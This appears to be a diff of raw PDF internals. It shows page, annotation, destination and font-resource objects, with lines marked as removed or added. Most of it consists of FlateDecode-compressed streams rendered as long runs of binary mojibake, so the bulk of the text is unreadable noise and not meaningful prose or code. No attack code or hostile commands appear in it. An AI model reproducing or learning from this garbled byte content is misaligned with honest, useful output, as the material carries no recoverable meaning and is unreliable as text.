nÝܪÒìŸ$™ž+=–^±dÚ.Œ‘tÕúÒ:¶”¾®IòlÝ–†÷<†<Ã’†#é¦m¡]ÙõÌöuáñîíð“Ò׬Ór‘jBÀÒ[³™KKÔ ¶-¹àk›ÌW6 i†Á&È4=¾æ& »qÜÕÛ]ÙÒ­öÍࢿ«µ/Åg&÷$I2æß4ô)Ÿô†lb¶3?÷cLqÎí;d´Ãg¤àãh–ø1 7à%k:ˆ±ºÀ°Öa˜¯€AqAçÛ+&‘àž|Ç%iÂaø¸ ¡GBCnSçž8¡!.€êd7MpøñÏd㜀sÐÀÙjä Î+´žÔsQ¬òg ¶¯f½¥Vq‰+;¦»sÓ[fô>ÍWc.)ŽªÙÔ»[„67ƒñËAÁWðÉñdJr\¼ÕÆÏgW_Î^Az›Ç9îBœëñ=™â|Öåó«ÞYïH¨GçCÿ+=¯Ž òûLÂߊ ı†‡g½+þï³Á98DµÃGm‹Ýå˜æ?àQ·"³ÅÎ2œ3º•¼z¿ q‘d)¯†cm•ÓJQw~ðCƉÀ<><gÞ§¢!Uº‰<×áøŽ{øY‘À¯Ÿ]Šƒ0I£t\eêóég>±Žì÷:Èü â¡ƒÝkÚÈ*Á._Íi•Öß÷«à*RªmÉZu`t‘cˆÚ{òãŒ]$Ã0Ê[ËFŸ¯^ªí6T]Ï®jµ€5\£„³<ÇBš;_Aý|Œ)ÿ—j©»ºÓWVkÃÂgZÊÌ3îaprÛ8j ã¹Èu*¸Ño!Gw*@ÔºKíźñyÛ¡k.2\ &²U‘Ž_„Vg4¬^º¶2‰b?CÙŒ[ä)?„”f]EÑi6Ò5ècÀÙД¢\ Ä3˜(p:ßHBQfѾöAD×>5–äg/IÜZwŸHB(ñ#ò÷B„^£18Os®Úõ7h›ð?’ô1bç׬ÀÛ€ö“º^g‹ôKîà\åa^aŠJÌZ¤Sºº“ÓáP\\V[IŒÓ)Ýfÿ½l<@RâšÓ´î ¶9µû5\Š#³ªRg8©šô®l¶À‚S/æPžŸ5¼Ú÷$Ú,ùËoô´Ž»£„iŒ’@q/ªË“2ýÒlJ—î»\¸(@Ô¢›÷ aýËv”–ZPa²Øò¤™uz«‡¯ÜLm„7üzxýþàˆ.¯‡·kÒØm’ù¼›\xbÊ÷iå•©£*j,úA€3*!¤SQvW—²ëZž¬Y)½—Ýß&û*r:{|lŠsšTÔÁy¦Ø3È’õnä'ã)ü|À8‘§E'%Žµ~]·JÕUžØ½Š: õLϾCG¿‚<;å"f(A<þE>á¨n‡Äì÷¬ÖV²dÜÙSöÖ“¹.p.ƒsRb?Ñ´6K jZq4×S·zü˜ÄŸ=œÕs†º}IQæ+4³u­eiü¬,?êêÁÅ1ü=º¼¸€îvpyñu©`r?êÞþ‚¹²Í—èxºÖ¾eû$oóÉÛx&ï÷Óɚ57жþPEmk -endstream -endobj -637 0 obj << -/Type /Page -/Contents 638 0 R -/Resources 636 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 627 0 R ->> endobj -639 0 obj << -/D [637 0 R /XYZ 72 793.935 null] ->> endobj 636 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -642 0 obj << -/Length 1091 +/Length 3374 /Filter /FlateDecode >> stream -xÚíVmo›Hþî_ª“ŠS³°¼Ã©:%­¤×4陜*嬱7†;Þ K÷×w–]ì$…*u©úia˜yžagvöѤ¥¤I‡ƒÕêIXrtÉñ4„=Oš§ƒ‹™&-ÀþNÒé¹ÒMã•J¦íšHÓÁÇÁA0P':–<äÙº-WÃ@žaIÁBº-4T\ϔϫpI†³à:ÁÖÓr‘f`ãæ2ÐDj€mK.øÚ&óULÃ@Ø0$Ųgê<æ!4ca¢`r5ć(òÓÔ×µÙP±tK¾x;>bùüP¼ÇYLã0‰?ÇÙ’[hDøÃ<Ï®â%8×eHã<{bøÿ³ü&!à¼X -ËeX‘]Hæ ³ A]ÜM¿Éœ!ýÆZ„e˜JÊj¦ŠPúõŸÁ™0sœ’¼¦Ïž‚3¡Q¾9_ÇÁ=6ó‘»V’pK·e)ɪ&­Ø›)çÉHÉ¿ä—ÿ‘ùN»^m¨>¼çÀSÆD]ÅÉãŠüaЧâµÞâ¾T£<%jœ­ê¸R«U’†…š³þ¥EMUìèÛHÇìø`µ"UMý’dž" aåÆS¢°{›¤  3Ø´ &/š¹-/ Ë%¡âgÊäQ|Á_ûÀ7™¿á†Óó`ÖSF¿ uLãÔîRº®p•¨Ê¿qFQÄ‹×x‹ªb„»°öçsRPeA‰ Ð5w<=U\×òljz¥¸¿¯^kÈíñµ«]òŠG[ò¦RSS¬oð&a¶¬aª -b’)u5"YÃcõÇùm©n©zËÎU2 -‹"‰çͤÓƒ÷ˆ¦É+°‚ç¨ b††ÄãïEÆœÕÅ)óXV‹l9ÚS÷ú“9¯H©€sÖ&õ€@VêŠx³é'¿~¬Å·ƒS7‘çÚlœã}SyV¾Ÿÿh–vú'ÿ¢ðE×4°b¿«ˆoCJD^ÓŽ8†®qË„\¶Xk+훆¯‰·CÈí$èúë))¯I)÷‹pœu¤#¯Ëÿ“r–ß’,”ƒµˆ:ÿ£3Õ‚[Á¯’ek³+öï°lcD3ˆç v¨»KB¡‚Ê{’-i$ëÎNåëÖE»«ì‚iÛ¯sè·:àÂhÚBs`u‡þø6L qŠaÍÉÖGßÓ3¶ v«ONÖÓ0Á ×a£!Ûéàs,„ÝMD;ã>ë¨ë¡îÈì„ÀÅ‚eè -xÍ«˜2óš»%œ\™$éx.r]£·:è-äèNë°éÖ¤ê[J-»Èp-x°‘ã¸î7q¥­á&CO8µ¨X‹³RóõEDiá«÷.6ÕðÉÛ1v_´'Ë×üÑúÆù6gw»À·¸ë%yrq×Ëô$ângôÄ]ÿ®=½¸ëåúqq·…þiÄ]_JÏ%î¶|¿ÄÝ/q÷⮿q~qgú ƒ~PÜ}uMƒÁ‡ ­Ì +xÚµZYã6~ï_adƒ«%Q’¥Á"GOä˜ÃA°˜ Ù¢m¥eÉ#JÓã¿u‘–ÜJXì>L›¤Šd±XÇWÅñgû™?ûöæýM¿þ,˜­ÂÙ*ó½ ËfÛãÍÛwþ¬€ñf¾eé쨎³(Iá·š½¹yuóÕúæöEÌ2/KÂd¶ÞñÊËT<[³·óÀ[,Ó,š_/T8ïÚf±„ߢßveS/Þ­¸}ăùQ¢qöey™¿‚ßÔ[©”ùÿҀIJx~^„é¼é¹³ÍklDs£õóÅ2 +üy~:-`â\×EYïù+P…+˜I¦;è–§›s«uyWnóª:óè‡EœÌó +¸§î›W?òÄmKÒuÑx¾ëì:9ÀDhW½æî®iùpa88œBÍR™½YØ层ÈS©#1ý¹<È‘0®Ø¼8LgË@yI(wýPVHÃÏàh÷xtͽS•o5‹éá k!9Ø!ÜEoœ«r ÷—ó‰q씣 ·yLµ¢±æêÛ&'Îï—pü©ÈAkr#ßyïõQó-0…9›NépþøTÝ!esýQoûYQ Qe÷j@Pʧ‡®|æAb GñX rÌKh^,ptQAŠÚ7¸¨/Ä ¾üùn0òøò’Ä •›exoQ Ò)袉ɖ«¡n¤^˜Ú©ëÅj5oA™o°…ãŒM—ÍñPxÂVw}[›á¹¡aÀJùû Ä.SD¤P +”/J¯ªiË}Yç T*Q ;46µ +@Ñ:TË$’Mà£l-ÐTÔ½NƒŒ¹> Vñ|} ±‰ý•Ù`c¤´ÉŽGrînȨþ[ÁŠ:¯—¨I“mª’¤l°0VÖjô¯´?|è«Z·ù¦¬ÊŽ5#Uà™&”í»¿³I| jÑÁ€ìÌûꘃ‰`ùÇ_ö„Ø"€ßBw°·|­E ‰€\ú(6KøÁ£F@AŒGaâ¯íüBE~’5ËÎð$b±iï—¿û*¦™x»mZô•œr¹}­óbê¼,_]Ù”RäÀ¸Ñ·h,â8aN——•¹HLe•ðJ?5­¦U>ðPla–¥Õ¸Ië Ü°eÊã %¦1ŸunÎBØð/ʦ£(xL/ڽ䯿½™½¥é­6MßnYç®—(\Š¸ÃŸµ,Ž‚ÍËš¤†J¡,ô ã2¬`‡<|?µÓ\dFUöcµ˜ý±ìBׇ£¤8zQŽ)ç7ˆ³%á´0b)Ãïż¡36o 0ŽÙ„HMY¡ÕÛæp± ¨]Ã-F59xäívüí’0àêxa8J®Gvù¸Ì[á .„—Hú€kÓë'Âæ®iEsö ghþæ +=/ úÄèaR^"£±ydeQÑj¿ ˜è 8ý Ì +SFÖ@]wúìö6ÈB̾æxë@%ð/¸e>n8~†Îí^w”uç§Ë'ú)蹘$vºà—#T_°$&'€SÇ(Þa8‘L%­¼ïš£ÍÄ>ðÓ£,Š$=Ì,V×s†|cË¡òï I9ÊÝydùÑÈÉáç8Y1Žüè B¤Iütv§àÎ]¹øÒr`ÁùDˆp×ÏŸ¨Qæ%~" @ýoDòp€ü,õÀ]FÕjFá¸DGÉ'à´\© ÃNÏ`çH¼tž'9çû÷Wð´0ø\ÿ½(^€êöÔ–6-)È8§%0ìrZì]ç´dô”Óþ¹þFë¡J8r¨D"4à +ÚgF>žð;† É¿Ã(Û#¶ôÇNצä@‚rµ®T4¬ )’ô_ZÀ1L]äìÆQ›yÛVxʆS…+n kmllÃ0X›ðÈpB·š€0ºƒÜjuSiO,7˜*:©Ð[ÊVíB/„­È¿±á½¥©RªÕh TOà!RíÔêK:ÒŽt¨Xä±KÅãê~ádaì…¾œìWL:•?ïÅP±Äf—|>ÉÉÍ¥¢1I +A. +¥ÉÓ¼„ÊS‘ºˆüM:ÐÌ[éIÆØjÚÊSI|]zwu0‹ïÌE€sNŠaæ +8OV9"WåP¶Êa ZRT;³Ç¼Žq鼎Á.-ÚÕP)M×¢ÉOxzÀ‡7)^¨aÝ㯼ð’lÊ[åcA£ 'éå½l³qƒÇJR–$nd}vìk`â_0v®“ ³nøqÂ:~h  –¯”½é97F¼rÐ΄e:Ý8›PEWÞw<®î¿ÀÒ=—šÁ5äö!0Lííáx«Ä•Úh*]Gö å1¿g×›Ò݆„\ ¥!§™ºD­“G. 隉ÿõ–ü«®|jn7ôÂÁp±8O)E0uà âxPèÀÞE+ÃUp!`PÊ\Ø>·z´V"r”uwW±Ùê‚{W—³YÒ`@[²¤Ú BâèóäÒ—|©Ávøâù†Ž¢,™¨¶(eÆÆ©eÀWBCá.µÆDCLjõ¾¯ré@àÀ²ÄÁT‚+>²vNmb©&ÂïùÁçE"ÆAC:çcY“7¥ùë_^íᶺÃQ‚0*Ž¬4ôè'XÀ>û@Ó:>lÛÈ<Ü㶆•YÍðUpq`¸ÐNN™ Meê2ш䑺üµž¦1OýXqÉþ(oA;y˜+—w.k.N“Xõo÷Ö`ß öYÉjm*§MÏPÈ ÕxS«Ê0¸­p¡¼]vvѶþŒï]X æ&WsòÖèîùdæ<€/ƒ²¿9ŽÍåî‡ÕMp#å~oÃM›×{[šB> endobj -643 0 obj << -/D [641 0 R /XYZ 72 793.935 null] ->> endobj -640 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -648 0 obj << -/Length 1624 -/Filter /FlateDecode ->> -stream -xÚ­WYsÛ6~ׯàdšŽ4 A/ÇrÇnœkâFI䤭›ñ€$$±æeŠ­üú.ʲKÇ™L_øöÛÅ^€\ki¹Ö‹ÑåÃèZØ -‰Æ.Âql¥åèì³ke°þÚr#ëJ¡J‹Œ…õaônt49Ï ¶b$°æ Íá¡Øó­yf}4±£˜ŽO;¶ä“Ïó×Îsìïà©!—¡BãHBF®1 ¸+l@%Ö¦ž‡°çÉ ¢4Ö2سúŠ·<³6{Û'þx6Áã—3ÇG6þ¥àUµ¡’XmLà8ž–ýÈÚ^æ0My#ìã -dÓ:Ë«åÀouUñTäueÄÒ¢Žç-«ºoT3*:NWëê‚g÷ð ^ {¾i¸Ñ €Ÿ_ g%Ê¢!ÅQ EöåÆÁ~Rg›ƒ[”Ôì'Þ½Ñ\-ïÖ…èö€rßI†,Ø,)¸†'u›ñvúàøÑ=èö`_dxß_9+¼+ÞnW’"ï:.„^p@bÉQŠïÙS§ÛW>Dœ!„>ëô"ÔžOTÎHW¹¡e{…Ñ6)ÉÄÆN8Ÿ@n²vÉÅ@nJGÔ5‰v8!DÃö¬G½­‹–N¢±t’?î#o|úþÍ7¼i‚·®­‰ì½$ìKÞ^pa…aÜCêv€¢O\¼e±×m1@d -døqŒ¡©Ë ¸¬]WÆŸ—EÉã2Èá%Ë«>ÄÌ@ „ ~×ÃÊh›”R©ÌãkV6½@mô°߃‘4ú³œlT½JOûÈEA8p®ÐG8ÚJhcönõÎûÆ»=+_û¼QÏï']ÿÍF¬¤ÝrÞO”‹P³Ñ+95>Z Ñì9!eD€P6 ;Ú§N¹‰žç•@ͪù5ϦøÑP3ÛÖñÝ¿â‰ÖÆš¦ÈSÉJŒm‚§«ª.êåöx9Óu<Ñm÷°aéÊt6HuË„¥6¯2 {vtòÁ4mE:›>s§ˆˆ)¢ÙÄ#PDª3DT…L6vÑéo(Kø,õÇѺmt@ê«ñÓ$Æ<ù²–%z©  ¼Þh8}÷?Vå`1Ì­bzÏd³‡ÞE¡9®X%g¡2Ž„ã/¹ºHÕÓ˜¾ˆÞ‘܆"z¢Ws³’wú[7ƺëòd+XkˆàÐ+L†LIWÿð\iÖëJ/çó™–iù%$.¸^ÞÛBꛣñµ\ÊånÖŸª­×Ë•©.ùPj—æÅôþÅH%4bn ;Ïë}Ú­KëL·ƒö>>½ÿIö¨€÷|Ñ ?Ü€Öu*77Ýéz^ßåÒ|'ovUâ›ÄIëê o;¨OéF¸ûœ¡î ŸD½È¢.à•ñcÝ‹DQý@÷*ô舲q »tê¼ÊÈQ/ÀþýþÓ©V«½²Ü£ÞgÍsöêw{þÖ|öŽU†È²7…„}ËRéwóÖ’i ÙÜé/yK nYÔ‹Ù‡'•|}¿UËZ˜ŽjÕ‚Z•|ÉÜ2Ö¨þn…³Ó¹ù–ײšà½¡vûâx®·oîï¯y‡ÀuQnXVæ•S±/ùR…D]"YЩl?‹ú‚WS¸èièâ€z$pÇŽÙÑ©%^¹~@†áõEÞ?¿g³ÃóWϤ&‡É‚Ò,1ãI˜yŒD!h A˜EAê=5Ñìª9ÙJ›§^¤q'‰Yq–$4 Ý(%Ù"J†”g@ž`ï–Lõžã´_/Ù jÚÆÓõËø1yþÕ‡™UG0ž<öžÝàN;ø‚§Í«ê¯k?ÿ4ka O‡,üyº’9+¦yWÛQä4¶ñ ßyZ…ŠÌúDÓµXDçòù_åð‡Ÿ§ùŽÄþÙtùW>ÍxÁÏîU]°j9å• lvôT'¤\/ÓvÓÀâË´N®ÄåUºéÎ)•—Ρ\Ê­ŽAÿÖ¿©ÍóåŠUúºÐEЗgׯ¬òn›Ê¿jsÎþt*çÒdx5”×}Y•Ù2òá²øÖÓJ¾¾»éñ|ô/>-%z -endstream -endobj -647 0 obj << -/Type /Page -/Contents 648 0 R -/Resources 646 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 627 0 R -/Annots [ 644 0 R 645 0 R ] ->> endobj -644 0 obj << +633 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 275.83 122.991 286.621] -/Subtype/Link/A<> +/Rect [149.456 553.455 190.902 564.246] +/Subtype/Link/A<> +>> endobj +637 0 obj << +/D [635 0 R /XYZ 71 806.89 null] +>> endobj +18 0 obj << +/D [635 0 R /XYZ 72 375.623 null] +>> endobj +22 0 obj << +/D [635 0 R /XYZ 72 261.248 null] +>> endobj +634 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F26 632 0 R /F22 546 0 R /F27 638 0 R /F14 615 0 R /F24 614 0 R >> +/ProcSet [ /PDF /Text ] >> endobj 645 0 obj << +/Length 3266 +/Filter /FlateDecode +>> +stream +xÚµZKsÛF¾ëWðHV™0¼²§xc;Iɉ)µµ•ä0F"b P6ÿ}ú5 A²7µ¹ˆƒyôôôôãëù«û•¿zsõá*€_¬µJ2ß ²l•®~ûÃ_ÐÿÃÊ÷t–®>Ò¬ÃJÇ)üV«›«Ÿ¯^Þ^}õZ«ÌËb¯nï˜Fèea´º-V¿­•·Ù¦™^¿ÞdñÚšþÔÚnóÇí_½¢Ñ2‡ž¯€.-JpÆ•/ º_X¢GK¶Z§žŸÄÐ=­3^ú»LWÏøÃVèö¹-v»3-6@-X者–æÍÏ×Ü(ë?mÞ—M½Àuž¨½ØlC8¤©ºZi¸~_7•¬?ÖüiäàSy^eŽÄÝ©ªþ&+Aæ¥aà}½ÙF:Zwªƒ9òö­=V&é×^7-YmÃ(ô”ZmƒÐ‹UÊ‹Í–¨tmëfë [÷üî-7Ìï~3$9ø>šv³ Öf¬¶·ð¡• Ï–}w{ûŽ[­ýp²]ÿ‚Of¸³;×Ø·7}™›ª:3•‡M„R-e+Άyö`y Oíú¶¬ïéd¾œIô"o„tYãŒm¨îêp Œ´gîù¸/sœ¶çÏã©ç)MÍû¦*¸EGÂÆÎЊ÷xü­…óׯùöåÛ™ÛðokAýk½ƒ ¸0¡Ö¹m‘7þ VOTžÜD²¶­ðqÇ: ç):o餯7pÙH]ep…ÆGeNüØO·…Üv|ÕMÝYÔ_?†áûÌ æ=I —îÊ›\v‰K‘JGw¬1=.þˆ¬­yI +§¸ÝñòGÛò`¦ÈƒË~/}{éjÚò¾¬MµtÜ‹"Ea,š–E$sÜÍ Œ²¬ïð´Ã±ëÜòÀ° 9õtÝ؉b&"{ë–ÿ锺çŠXʦ59+?Ìrr|4 1 ƒõuùžäÄ3îÄ g§c±ÊY€ïÊšÚy¬0ÔëÞ2éº)à†¡¨&4ve'þ‚>Mu‚ì÷þ,;&Ö^•¶ðf^sêkÙmnUàEÙßñ´¯Ú¶iã +üÏ ÞZ2~<ëØ´U2rlÚÝç"Aÿ¦t:òoøE “±/ãR `å‚Ž±+ÃÐn#>Œ†¹·0½Aö·¢¹6/aÎÙ‹:&'w·à͈mƒ¥ƒø‘Á¨!§cÀEg;n‹ûL÷Ï-»öÖ¶íftÆ +Tœ¹Ý2ìoM›£“Ùó7©=ü’çZPF‹—”âœ|×™{v¬çêB€øXœÈb†ÆÅ„pűµÛ¢k sø‰ÌŒºÙtd?:Ý„úL”D@  O)ëEwy»GCÐ,'¶„]=YBvGŽã}'½{ôm´d?žˆŽeÇdT¹aãà {#»ˆ£´Ò¢C)Ü.*„fÃ#EÙåUC·‹Ë$Ìlm-óœF.ê`j¸‹<ÐÞ»s"b›—›ÄîËMâWSƒžBüøg½Á¯?~ÿÓà°!Ú`ð±ù‹b{äGÏ{À}A`—ŽìÒÚgØ•ìÒaöìÒב 1’£h¿œ ?›GŽ)Ž’q!#ì{‡£ ‡î6ĘȈ!X(Rëy¥0˜x¥0 ¯„½äbçb0>œy0(!ö”÷Й°!¦‚AÖ +%FNnFÛËW"ñ˜7eAª‘@›„Gó›UÑú›ëknܼº~õïÛ ¦pÞxXêñ&d$ðc^¢§Šíl”MTe¾˜h‹¶IŸ{ÆC¾À‘÷²abØ`Ûľ#è?O=šŽ¼îdýàH°}w\¨Dš iÌ“™©xisßäÙ_ñ–KRO';Ì6@œxÚg8øœWbÊÿÃÝ—‡²2­ôRö!ú2=_@$öCbb¹Eh4’PŠIã˜ Ç i@ßTŒIJ“j·•å™|ØåBŠˆ”#BÍtù Ì`ª þ‚4» +iÅ ãïtàÓ±jÊ~ÁĉèÁ”¨þ‘£RàØ"¿c@bZ…`Ìè+úö O¥ÇQ‘örž}Ï9¥^œ ;?œªÚ¶fWVe_’OöÇIIìbyŽ:|B/â9yéɉ ØÂ(p"V£‹ ä]23UÄ1AúجYGJTȸl°¤¦*ô=H0Ÿ×SH\ƒ4usàÞÁrÙ ÐZ#ûSpšžcgÛÉdá›UPÉé[…x¥3/ÒÁTDNg1ø9Ñ@„,% BXÉPÝÈ?Œ“oz°5Я÷ø‡±rF,’6¨ý8^ú5<&ÁüÕ8L‚Ë0©@<£0©ðþ–Âd{‰˜; S§ª/h Èê è© ZEÇÝ7 ì³ÏOÀYÆjìÃÁ‘¥ò:‰!Ä +vs%ùbíµ;zÍÁ"†À|pöàÞN’4-±‹]8±wy<Ý2\ÏÛÔ”"³ÎcWn:Ùºìù·`ëtkÆ›¹µýˆ¿¡ÈB4³óŒ0À‚!iõ‘ƒ¤Ð!É´Fµ–4¢Z ÌëÊmÞT,EW·dÅAäéÁ@ÿµp•‘§ÔPÃb¿Ø{U5—‚@Á» y1pFƒc˜&4æyQ$ †=ó‡ýdóS/& F§|/ñ³%x‚.Îà=v¹¡SgïN•Lkø·=ÕÜ`à”ÎêM²²q·²poê%éÅÚÓaôyLBfURxÁFÁÅ"²'`¢Î¡Ÿ7JÆ6ó’ öÀìgkI³Ê'ÌpÂB%Søé<õd‡@A¬ +æ;˜m”ÇSežØÀ +ø¢E´CRF0¹éºrG>¥BGÁ4õåN|òöÔaÂÎ@?„ˆ‚{ Âc×Ƕì-7MžCŽ3oÄúZÓ»Šá6‹½4HçI¼Ëš¨ôu`åQù0“ +cä¡òÒR äQ®9ú<+Ì\‘t¯†¬½:—nÂ4ÑÃC¢GãœÚQuÀïa6áy\pC] n7T…N«‰µù¥=”•…”ÐЫ«Ô‘"}QÚË|P±Y*U~H`€J`ÿ[{htX|¢|aå¿T£<1¹VÈM˜Þ•$˜Õ‡ _S%ñéSë¡,lÓ½:ØÞJ7­œrßt 4)­•ŒÏí½¼wüòæjõ-~Ÿn‘­“ó1ã˜Mó$-‰ÀjH u¬älÚ÷byï@9ø>¾w¨gÞ;P€üô¨dë&sqî1ÖY‰;E)rê>¸ÈÆ`áJW§Â~½tcþô®”È]½±6[‚ g=bö)x‡Î0Qðuü$¼™œtoè ôÆùé$:bOvAˆÓdÌ@ãí=ò‚MÁÿàÎ/½äü?µ@ìåé |ŽN +É×îÞ!ðU»oí2_øå8üb¾Þ–yÛtÍJ¢5—"°`jÛ…‹ì—`|‰jÏ,{j`cíW5é[ÒÙx„éés«º¯ä¦@'²dàÜ+Z ÿ¿gèÌ—gÏ¥b[àùág¬[o’ ýøe÷º€Mâ/§JeÓ­«NiªLŸkhÇ…4?…kûr…—‚j§§)&Mõÿ¤°Ý<µtäËÅ$Yr)Î=«– ‹<ÄßWË›‰"†½Ó<>QQírêüBÞÓÃJ”`å ¶9å ©ä ©Ë†’Iµ|!½¨'–Þš“0õ@FfðñPnÈ'Ù( G¸è!Ã! +-e@V˜‰yJœÌp¦¼#jm!ž¡„l]õ¾'¯uEAÚõŽe†Ø§¤0v7z]|'³ÿÊÅÓ7ø}Ïïe%=ÀeLo¹‹ŸÞÆ2‘Ãý®ÌFÏt¦½·Bò×_®_ðÄ¡kx½«Ê®ç1*Í+åð®mOC?\öòÔ'l}:Ï‘QoŸ#“®ÿCnw“CV¾›ÒC°6£¹ü†-õ¾ªA…‹cIwè® ÑÙ©œ¹·®0ظçwpÁ”ïã‡ã’µ Síí'Ò©8áZ0üÊ.ñe–0͹“!÷ÎG¯b÷¨[Ž÷Aõ¡MçOƪ?;öPÍMB÷Ê-d3Ñë7 +iöS*uy‹“e£Úh2qgO€}˜ôFžÓï«Ç? Ý«¨ÐÔk[ßsÅ;q ÷<‹í²—æ©âM¥l¬ZÇZ²®×âPnêÅpzu{õÈ#¥Õ +endstream +endobj +644 0 obj << +/Type /Page +/Contents 645 0 R +/Resources 643 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 647 0 R +/Annots [ 639 0 R 640 0 R 641 0 R 642 0 R ] +>> endobj +639 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [136.52 275.83 215.206 286.621] +/Rect [315.25 336.356 356.53 347.147] +/Subtype/Link/A<> +>> endobj +640 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [400.178 102.401 451.319 113.192] +/Subtype/Link/A<> +>> endobj +641 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [463.156 102.401 540.996 113.192] /Subtype/Link/A<> >> endobj -649 0 obj << -/D [647 0 R /XYZ 72 793.935 null] ->> endobj -82 0 obj << -/D [647 0 R /XYZ 72 586.085 null] ->> endobj -86 0 obj << -/D [647 0 R /XYZ 72 524.902 null] ->> endobj -90 0 obj << -/D [647 0 R /XYZ 72 353.162 null] ->> endobj -646 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F24 512 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -652 0 obj << -/Length 1363 -/Filter /FlateDecode ->> -stream -xÚµXmoÛ6þî_¡*-JÔ›®HצMÑ—tq1 iPÐs‘%E¢›x¿~G‘²$[n$ýbRÔéžçŽwGžmãÚ°7£Û†Ñ6°8FÙG‘¯F—W¶‘Àú;ÃF$ -»Zje?„15.FŸG/g£É©ƒE¾ã³…Òá¢ÈõŒYb\š[aDÌ/½fã«Ù»É)ö:òÄ ‘M@a-#)2²55Ðí!ÈúDÊZÄuv]9A„Dê›?óü†³éØòÏ ïcþ*ûß¼žµD@¸Ë…'ƒ†?’`ÁËÕ^,©èØÀ'Dï9€Až£ç]¨‚š{öo[¹ˆÙT°Ÿºãb©Öì­$dÅ’U¼:*õ~TÎ3VÅ´`‰­õŠ•*œ÷9{ƒœe¢ìÒ~|Pìó’…´äGñ _+ƒnìq•n’%[Çîèažç ðËL?]Dÿ€d÷Ešó½kÂÅç÷»Åæ ‡#® Î1çè"/÷-íå"Ðú¨õù ›ÓúRÕ|Jv»æ%«°Gþa#]|8K))™(9ûÎ}Œ¢0Ùͪ}2îƒÈà'Ð1hÏ›7w¥ò{sÈ VÒNAÝT‚­´–÷<[ßëûÄÐÖ™Ð)"¬wó«íÙg™(YÁu~žÍÙ=¬âR E‘ò˜¶[°x™åi~½iîöoÏÕÄCòWR'›ðs`}ÐÎ9o,–i:¯^~¸˜ª¯ÕÕ«ÒkSÍÍéºò é®¬r@—¥e,¢ ´Æ \êú¾™/ÔX§¸œcË Í¼ªøœ§\p™Ê]AÕŽ¨9×ïÒœ&u> endobj -653 0 obj << -/D [651 0 R /XYZ 72 793.935 null] ->> endobj -94 0 obj << -/D [651 0 R /XYZ 72 386.045 null] ->> endobj -650 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -657 0 obj << -/Length 1646 -/Filter /FlateDecode ->> -stream -xÚµXÛnÛ8}÷WŵH¦DÉ– dƒÛ¤-Ú4m\ìCšF¦mm¬K$º‰ÿ~‡J²ù–¶O¼hDž9œIŒ™AŒ‹ÎCdž–¶1tŒa@,;Œ0îÜÜcó b¹o<*©Øp>´ ãºóµóvÜéŸ;¶XÁÀã)®A­€zÆxbÜt=«gúÛý^°ïÝŽ?öÏmoMÞõ|‹¸° ’vˆé Ö>È\)kº”Z6¥²c¹n€ÿÜÌç£89ÎmÏô¯{óáò¼gw¿è¡à…ˆ’Š‡v¢ä?Š(MäÐíbëu¯¾\±—±œÅ\ð‡¯£Ék}ŒÄçH%É1çETHðÜ´`Œo™ð"dŸà0YÆ<@8líµ‚áç¸G¦É4ÊãÀ@°ÌmeóxTœœÁv&×Ѳ‚Ý-8NýÉC¦Ø~/xn¾™Á²íœÔß_ë œ¬øCpüûæà¸üpyqÛ¶ësîÖ]²TÿqÌö;h˜¦ùsj·VTJ u}k÷°­ç|÷¢ÒQp&çË(çÅŸ:ÿϫ믟~ƒ¾tœ‹<â?ùd„cú…J:ïXxoòD»Õ?o?_kšA¸Øƒó‘ßé(Ì󟥦ÏÙZ€^‚Çé§(Y>i3¾ƒ –‰XâPæ ìý yÏòÉ -‡ïyž&0gïÀ²l…¬Žÿ‚‡ó$]¤³•Þúêýv< 8A©7 K"˜÷Û ó9C#üyQ³Ÿ–‹‹`Rl$QÓq­€ “:ÖЦe&…]z¦m»A÷*O{ð±òX§>í^àD:“†.'&i~=°íåBh9¦ZИå3.ôÜd2/Zò3hçÀÎD'Û/™$m¤1;k‚th œa™ÈÍYËZ¦–1mß(ùA‚ TÅÙ²E!U¡ {¦3ì¦RC[˜rbùE¤(+ýLÿ% WË(G18Ýç8í!”3´ÄyñnÜÔ,BüR¦ŠC¡4µû\é –_§Ø®zŽßM—9ŠÈã‘ã¨Qj!OÈR&„Êo23ž+Nˆ N‚¦J‰ÓÙ½\™ëOPÑÄ,ÃO Ÿ¥"b‚ã'Lj²‡HA¢à,åïúOfQ¢Å#¥* -½”ø}¤Å÷ÐÞ©y½.ÄWYà ”ÈP"‡Èã ÛDqRyËÐ6hÕædM9Ú,ØÓ­WnOjvzâ¡n®l6!åå9Á@å#ÙÑäèU†k«h‚Êòš‚Ô¶ù±Ôßc\¾5€#n3.X™÷2*« `Ôv›ìh»B’^1ÅîÚ<í>ö@–È)í ›.㶹LmÛœUf²î‰Qå‚ (¦2‹†‚Opêû·OVužkvüî‰ÅþW»GóÈ(Æ+•äRÚt%šù_†›†cW·‡"|´Ÿ›Èˆ‘Æ,J¬01Öò'1ÊæYÛ¸¶eûÕ‰ŒWmíæÕ„’@% ʲÿÒÅÄJÌË"§Ê”U[™NY¦N}¯jø%tm¢¥ù‰m•åd¾ð‡TNý:•Ã:çe*‡š¢uåÃË4Ù^È]ñXÖ§U²h”U˜É-LU„Ø^Y¸¤Néâj²äx%@pXY©5äJV„[cE•pj«9Ñ™6ÐW“i¥EŒ¢PèµÁ–~RWó´» -A×>B;V2+ØBAÓ&JLÎÅ è\æú‚kÚþ– "õûÀ£,„+ƒ‹ûÕ¶ÀÚΦizj;'%»Vþƒ—&–lØŽ¨­iënÔκ@ˆgûªÙ¸Åe“]ÚÒ=Ú:¿¦­£´½cù©ãþ.mé˵uöhKÒVÌ#¥íjÿ…Õˆ+q?áE©=•Úƒè™H'luêú´Áò¶Örº…y 